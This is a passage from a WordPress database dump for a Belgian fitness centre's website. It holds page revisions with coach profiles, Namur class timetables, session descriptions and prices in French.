class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-24 08:41:15', '2013-11-24 08:41:15', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(406, 1, '2014-12-15 19:47:31', '2014-12-15 19:47:31', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenuhoover\">\n<div align=\"center\">\n\nNamur\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1>Small Group Training - Namur :</h1>\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\n\n&nbsp;\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td class=\"ttitreh\">Heure</td>\n<td class=\"ttitreh\">LUNDI</td>\n<td class=\"ttitreh\">MARDI</td>\n<td class=\"ttitreh\">MERCREDI</td>\n<td class=\"ttitreh\">JEUDI</td>\n<td class=\"ttitreh\">VENDREDI</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tvide\">16h45</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">17h30</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcore\">Core</td>\n<td class=\"ttrx\">TRX</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tvide\">18h15</td>\n<td class=\"tvide\">Réservé Squash</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tforce\">Force</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tcircuit\">Circuit Training</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">19h00</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"ttrx\">TRX</td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">19h45</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tcircuit\">Circuit Training</td>\n<td class=\"tvide\">Réservé Foot</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">-</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tvide\">20h30</td>\n<td class=\"tvide\">-</td>\n<td class=\"tvide\">Duo Training</td>\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\n<td class=\"tvide\">Duo Training</td>\n<td class=\"tvide\">-</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\n\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\n\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\n\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\n\n&nbsp;\n<h1></h1>\n<h2>Réservation des séances :</h2>\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\n<h1></h1>\n<h2>Duo Training - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1></h1>\n<h2>Personal Training - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1></h1>\n<h2>Coaching nutritionnel - Namur :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1></h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Séance Booster</td>\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Personal Training</td>\n<td class=\"tcelluleprix\">60 min : 60.00€\n30 min : 35.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Duo Training</td>\n<td class=\"tcelluleprix\">60 min : 35.00€\n30 min : 20.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Small Group Training</td>\n<td class=\"tcelluleprix\">1 séance : 10.00€\n1 carte de 10 séances : 90.00€ (valable 6 mois)\n1 carte de 20 séances : 150.00€ (valable 6 mois)\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Préparation physique</td>\n<td class=\"tcelluleprix\">1 séance : 40.00€\nSéance de 30 min orientée sur les spécificités du sport</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-autosave-v1', '', '', '2014-12-15 19:47:31', '2014-12-15 19:47:31', '', 363, 'http://www.crosstrainingcenter.be/363-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(407, 1, '2014-01-18 18:52:33', '2014-01-18 18:52:33', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 18:52:33', '2014-01-18 18:52:33', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(408, 1, '2014-01-18 18:55:39', '2014-01-18 18:55:39', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 18:55:39', '2014-01-18 18:55:39', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(409, 1, '2014-01-18 18:59:25', '2014-01-18 18:59:25', '', 'zumba3', '', 'inherit', 'open', 'open', '', 'zumba3', '', '', '2014-01-18 18:59:25', '2014-01-18 18:59:25', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg', 0, 'attachment', 'image/jpeg', 0),
(412, 1, '2014-01-18 19:01:49', '2014-01-18 19:01:49', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:01:49', '2014-01-18 19:01:49', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
